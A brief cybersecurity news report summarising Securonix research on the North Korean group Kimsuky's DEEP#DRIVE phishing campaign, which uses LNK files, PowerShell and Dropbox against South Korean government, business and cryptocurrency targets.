Attacks leveraging PowerShell and Dropbox have been deployed by North Korean state-backed advanced persistent threat operation Kimsuky against South Korean government, business, and cryptocurrency firms as part of the DEEP#DRIVE campaign, which may have been ongoing since September, The Hacker News reports.
Kimsuky — also known as APT43, Black Banshee, TA427, and Velvet Chollima — commences intrusions with the distribution of phishing emails with a ZIP archive attachment containing an LNK file seemingly spoofing legitimate documents, according to a Securonix analysis.
Installing the LNK file prompts the execution of a PowerShell code that not only fetches a Dropbox-hosted lure document but also retrieves another PowerShell script for system data exfiltration activities while installing another PowerShell script for unknown .NET assembly execution.
"Despite the missing final stage, the analysis highlights the sophisticated techniques employed, including obfuscation, stealthy execution, and dynamic file processing, which demonstrate the attacker's intent to evade detection and complicate incident response," said Securonix researchers.
